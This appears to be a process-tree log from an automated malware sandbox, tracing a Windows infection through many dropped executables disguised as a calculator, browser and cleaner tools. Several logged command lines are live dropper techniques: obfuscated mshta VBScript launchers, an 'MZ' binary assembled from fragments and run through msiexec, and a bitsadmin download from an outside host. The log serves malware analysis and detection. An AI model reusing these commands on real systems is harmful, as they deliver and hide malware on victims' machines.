                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2620 /prefetch:1
                                                                                                                                                                          12⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          PID:8840
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=2864 /prefetch:8
                                                                                                                                                                          12⤵
                                                                                                                                                                            PID:9072
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3380 /prefetch:2
                                                                                                                                                                            12⤵
                                                                                                                                                                              PID:764
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=2820 /prefetch:8
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:9064
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=3856 /prefetch:8
                                                                                                                                                                                12⤵
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                PID:6796
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=1764 /prefetch:8
                                                                                                                                                                                12⤵
                                                                                                                                                                                  PID:2296
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=1480 /prefetch:8
                                                                                                                                                                                  12⤵
                                                                                                                                                                                    PID:1748
                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\zphg9DvAIrDrXFQAeck5krKl.exe
                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\zphg9DvAIrDrXFQAeck5krKl.exe"
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:2840
                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\zphg9DvAIrDrXFQAeck5krKl.exe
                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\zphg9DvAIrDrXFQAeck5krKl.exe" -u
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:6884
                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\3HRBsEjn8fsRzwUB_ap1rMWy.exe
                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\3HRBsEjn8fsRzwUB_ap1rMWy.exe"
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:1908
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-ANDAD.tmp\3HRBsEjn8fsRzwUB_ap1rMWy.tmp
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-ANDAD.tmp\3HRBsEjn8fsRzwUB_ap1rMWy.tmp" /SL5="$80596,506127,422400,C:\Users\Admin\Pictures\Adobe Films\3HRBsEjn8fsRzwUB_ap1rMWy.exe"
                                                                                                                                                                                      10⤵
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      PID:6872
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-FODC1.tmp\DYbALA.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-FODC1.tmp\DYbALA.exe" /S /UID=2709
                                                                                                                                                                                        11⤵
                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                        PID:4600
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5a-156a6-c77-2639b-9c05f3ed8cdda\Jigecacela.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\5a-156a6-c77-2639b-9c05f3ed8cdda\Jigecacela.exe"
                                                                                                                                                                                          12⤵
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          PID:2348
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k1uagn14.0fr\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                            13⤵
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            PID:1908
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\k1uagn14.0fr\GcleanerEU.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\k1uagn14.0fr\GcleanerEU.exe /eufive
                                                                                                                                                                                              14⤵
                                                                                                                                                                                                PID:6476
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rzzg5hhh.qfc\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                              13⤵
                                                                                                                                                                                                PID:7808
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\rzzg5hhh.qfc\installer.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\rzzg5hhh.qfc\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                  PID:904
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe & exit
                                                                                                                                                                                                13⤵
                                                                                                                                                                                                  PID:5996
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe
                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                      PID:4720
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe" -u
                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                          PID:8736
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f0ba4foj.ixt\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                        PID:2464
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\f0ba4foj.ixt\gcleaner.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\f0ba4foj.ixt\gcleaner.exe /mixfive
                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                            PID:7996
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t0u5i2hb.xqm\autosubplayer.exe /S & exit
                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                            PID:3696
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\t0u5i2hb.xqm\autosubplayer.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\t0u5i2hb.xqm\autosubplayer.exe /S
                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                              PID:3504
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                  PID:2308
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                    PID:9020
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                      PID:9080
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                        PID:7900
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                          PID:7588
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                            PID:3304
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                            • Checks for any installed AV software in registry
                                                                                                                                                                                                                            PID:3320
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                            "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                            • Download via BitsAdmin
                                                                                                                                                                                                                            PID:1968
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:3812
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon178d8e5d06822.exe
                                                                                                                                                                                                            Mon178d8e5d06822.exe
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:2160
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:4488
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:2152
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\2954983.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\2954983.exe"
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:5408
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5338000.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5338000.exe"
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    PID:5284
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4151522.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4151522.exe"
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    PID:6064
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5406726.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5406726.exe"
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:4488
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\5406726.exe"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """" == """" for %T in ( ""C:\Users\Admin\AppData\Roaming\5406726.exe"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                      PID:5768
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\5406726.exe" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "" == "" for %T in ( "C:\Users\Admin\AppData\Roaming\5406726.exe") do taskkill /im "%~nxT" /f
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                          PID:5508
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                            taskkill /im "5406726.exe" /f
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                            PID:6212
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\2367830.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\2367830.exe"
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                      PID:2196
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5093277.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\5093277.exe"
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5904
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:3852
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:2132
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:3500
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                      PID:5144
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:1152
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                    PID:4296
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                      PID:3712
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:1324
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                                                            ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                            PID:5436
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                              PID:5728
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                  PID:5976
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                  PID:1908
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                      PID:4852
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                          PID:648
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                            PID:5104
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                            msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            PID:7832
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                      taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                      PID:6120
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                PID:2972
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:4252
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 792
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:5968
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 804
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:1368
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 812
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:5880
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 824
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:5612
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 928
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:5296
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                PID:1536
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                  PID:696
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                      PID:5360
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\chrome3.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
                                                                                                                                                                                                                                  8⤵
